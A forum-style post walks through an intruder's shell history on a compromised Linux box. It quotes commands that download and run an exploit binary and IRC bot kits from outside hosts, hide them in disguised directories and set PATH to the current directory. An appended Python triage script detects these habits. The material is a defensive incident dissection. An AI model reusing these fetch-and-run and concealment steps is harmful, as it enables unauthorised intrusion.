I had something along these lines happen to a box of a friend.. Just a 'toy' linux box..
An ssh 'knocker' found a weak user (user: print, passwd: print (that's plain stupid))
A few minutes later came the 'hacker'
Or should I say lamer.. let's dissect..
.bash_history
changed password
Code:
w
cd /var/tmp
ls
hostname -f
mkdir " "
cd " "
A nice hard to find folder
Code:
ls
pwd
wget esteticu.org/mremap_pte
chmod +x mremap_pte
./mremap_pte
old kernel exploit (ptrace) won't work
Dude.. you aren't root.. that won't work
Code:
ls
rm -rf hide
rm -rf hide.tgz
wget ideo.go.ro/psy6667.tgz
tar xzvf psy6667.tgz
rm -rf psy6667.tgz
cd psybnc
chmod +x psybnc
mv psybnc backup
PATH="./"
backup
ls
rm -rf backup
kilall -9 psybnc
rm -rf psybnc
exit
Ok.. so you installed an irc-bot as a 'normal' user behind a NAT (he could have known this won't work) while you have a valid login (with your own password)..
Code:
export PATH='.'
psybnc
ls
exit
Still won't work
Code:
export PATH='.'
crond
exit
I don't get it.. perhaps there is also a 'fake' crond exec in the psybnc package..typo 
Code:
w
cd /var/tmp
ls
cd " "
ls
killall -9 psybnc
rm -rf psbnc
uname -a
Should have done that a bit earlier.. could have saved you some time
Code:
wget www.skimy.go.ro/psy.tgz
tar xzvf psy.tgz
cd psybnc
sh
ls
killall -9 psybnc
rm -rf psybnc
rm -rf backup
cd ..
ls
rm -rf psy.tgz
rm -rf psybnc
OK he found out such a bot won't work behind a NAT
Code:
wget artist.idilis.ro/xpl.tgz
tar xzvf xpl.tgz
rm -rf xpl.tgz
mv mech ".. .bot"
cd ".. .bot"
sh
And that's where the bot sent enough mail to trigger the ISP to kill the connection :P
Leaving the poor 'hacker' disconnected and all the evidence of his mishaps there for us to look at...
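Added example, not part of the original post: a small Python triage script that flags the three habits visible in the history above (directories named with whitespace or dot-plus-space, PATH pointed at the current directory, downloads made from inside a world-writable temp directory). The rule names, the sample history and the example.invalid host are constructed for illustration.

```python
import re
import shlex

TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable staging spots

# Constructed sample in the style of the history above (placeholder host).
SAMPLE = '''w
cd /var/tmp
mkdir " "
cd " "
wget example.invalid/tool.tgz
chmod +x tool
export PATH='.'
tool
mv mech ".. .bot"
uname -a
'''

def disguised(name):
    """True for a name that is only whitespace, or dots followed by a space."""
    base = name.rstrip("/").rsplit("/", 1)[-1]
    return base.isspace() or re.match(r"\.+\s", base) is not None

def scan_history(text):
    """Return (line_no, rule, command) for each suspicious history line."""
    hits, in_tmp = [], False
    for no, line in enumerate(text.splitlines(), 1):
        try:
            tok = shlex.split(line)
        except ValueError:  # unbalanced quotes: fall back to a naive split
            tok = line.split()
        if tok and tok[0] == "export":
            tok = tok[1:]
        if not tok:
            continue
        cmd, args = tok[0], [a for a in tok[1:] if not a.startswith("-")]
        if cmd == "cd" and args and args[0].startswith("/"):
            path = args[0].rstrip("/")  # absolute cd: re-evaluate location
            in_tmp = any(path == d or path.startswith(d + "/") for d in TMP_DIRS)
        if cmd in ("mkdir", "cd", "mv") and any(disguised(a) for a in args):
            hits.append((no, "disguised-dir", line))
        if cmd.startswith("PATH=") and set(cmd[5:].split(":")) & {".", "./"}:
            hits.append((no, "path-is-cwd", line))
        if cmd in ("wget", "curl") and in_tmp:
            hits.append((no, "download-in-tmp", line))
    return hits

if __name__ == "__main__":
    for hit in scan_history(SAMPLE):
        print(hit)
```

Point it at the text of a real .bash_history to get the line numbers worth reading first; a history file only records what the shell wrote out, so an empty result proves nothing.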